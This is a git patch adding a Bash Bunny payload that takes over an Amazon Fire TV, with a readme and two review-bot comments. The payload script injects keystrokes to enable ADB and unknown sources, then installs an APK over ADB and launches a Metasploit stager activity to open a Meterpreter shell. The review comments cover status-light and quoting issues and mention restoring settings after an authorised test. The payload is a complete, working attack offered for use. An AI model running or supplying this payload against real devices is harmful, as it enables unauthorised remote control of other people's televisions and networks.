From f94fcc1b66432868e831af2eb984d82d037740fc Mon Sep 17 00:00:00 2001 From: DemmSec Date: Fri, 7 Apr 2017 06:18:34 +0100 Subject: [PATCH] Added a Fireytv payload (#135) * Created payload to shell an amazon fire tv The payload performs keyboard emulation in order to enable ADB and unknown sources on the target FireTV. Once this is completed the payload then installs a payload.apk file via ADB and then runs it. * Created readme --- payloads/library/fireytv/payload.txt | 75 ++++++++++++++++++++++++++++ payloads/library/fireytv/readme.md | 28 +++++++++++ 2 files changed, 103 insertions(+) create mode 100644 payloads/library/fireytv/payload.txt create mode 100644 payloads/library/fireytv/readme.md diff --git a/payloads/library/fireytv/payload.txt b/payloads/library/fireytv/payload.txt new file mode 100644 index 00000000..fddf81f1 --- /dev/null +++ b/payloads/library/fireytv/payload.txt 
@@ -0,0 +1,75 @@ +# Title: Firey TV +# Author: DemmSec +# Version: 1.0 +# +# Enables ADB and unknown sources on a target FireTV +# Then pushes a payload APK via ADB +# +# Requires android-tools-adb installed on the Bash Bunny +# +# Purple ............Running HID emulation, enabling ADB and unknown sources +# Blue Blinking ...............Running ADB command to push payload.apk +# Red Blinking.......FireTV failed to get an IP address from the Bash Bunny +# Green..............Finished +ATTACKMODE HID +LED R B 0 +Q RIGHTARROW +Q DELAY 200 +Q RIGHTARROW +Q DELAY 200 +Q RIGHTARROW +Q DELAY 200 +Q RIGHTARROW +Q DELAY 200 +Q RIGHTARROW +Q DELAY 200 +Q DOWNARROW +Q DELAY 200 +Q RIGHTARROW +Q DELAY 200 +Q RIGHTARROW +Q DELAY 200 +Q RIGHTARROW +Q DELAY 200 +Q RIGHTARROW +Q DELAY 200 +Q RIGHTARROW +Q DELAY 200 +Q RIGHTARROW +Q DELAY 500 +Q ENTER +Q DELAY 500 +Q DOWNARROW +Q DELAY 800 +Q ENTER +Q DELAY 800 +Q ENTER +Q DELAY 500 +Q DOWNARROW +Q DELAY 500 +Q DOWNARROW +Q DELAY 500 +Q ENTER +Q DELAY 200 +Q ENTER +Q DELAY 200 +Q ESCAPE +Q DELAY 200 +Q ESCAPE +Q DELAY 200 +Q ESCAPE +Q DELAY 200 +Q ESCAPE +Q DELAY 200 +Q ESCAPE +ATTACKMODE ECM_ETHERNET +LED B 2000 +source bunny_helpers.sh +if [ -z "${TARGET_IP}" ]; then + LED R 2000 + exit 1 +fi +adb connect ${TARGET_IP} +adb install /root/udisk/payloads/${SWITCH_POSITION}/payload.apk +adb shell "am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity" +LED G diff --git a/payloads/library/fireytv/readme.md b/payloads/library/fireytv/readme.md new file mode 100644 index 00000000..863bd529 --- /dev/null +++ b/payloads/library/fireytv/readme.md 
@@ -0,0 +1,28 @@ +# Meterpreter shell on an Amazon Fire TV + +* Author: DemmSec +* Version: Version 1.0 +* Target: Amazon FireTV (Latest Firmware/Version) + + +## Description + +Enables ADB and Unknown sources via keyboard input on the target Fire TV, then uses ADB to go ahead and install payload.apk from the switch directory and then execute it. + +## Requirements + +Requires: android-tools-adb +To install this simply share your internet connection with the Bash Bunny. SSH into it and run: apt-get install android-tools-adb + +## Configuration + +Create a payload APK file and place it in the same directory as payload.txt, plug in and wait. + +## STATUS + +| LED | Status | +| ------------------ | -------------------------------------------- | +| Purple | Running keyboard emulation | +| Blue Blinking | Running ADB to push payload to Fire TV | +| Red Blinking | Fire TV failed to get an IP address | +| Green | Finished |
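Review bot: in payload.txt, the closing `LED G` runs unconditionally, so the green "Finished" state is shown even when `adb connect`, `adb install` or the `am start` call did not succeed; the only failure handled is an empty `TARGET_IP`. Verify the result of each adb step and signal a failure state before falling through to green, otherwise the status legend in the header comments cannot be trusted. `${TARGET_IP}` and the `${SWITCH_POSITION}` path should also be quoted where they are expanded.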
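Review bot: in readme.md, the line "Target: Amazon FireTV (Latest Firmware/Version)" does not identify a version and will go stale; since payload.txt drives the settings menus with a fixed key sequence and fixed delays, name the firmware it was written against. The readme also leaves out two things visible in payload.txt: the launch command hard-codes the activity `com.metasploit.stage/.MainActivity`, so the APK has to expose that component, and the device is left with ADB and unknown sources enabled once the run finishes. Document both, along with a step to turn those two settings back off after an authorised test.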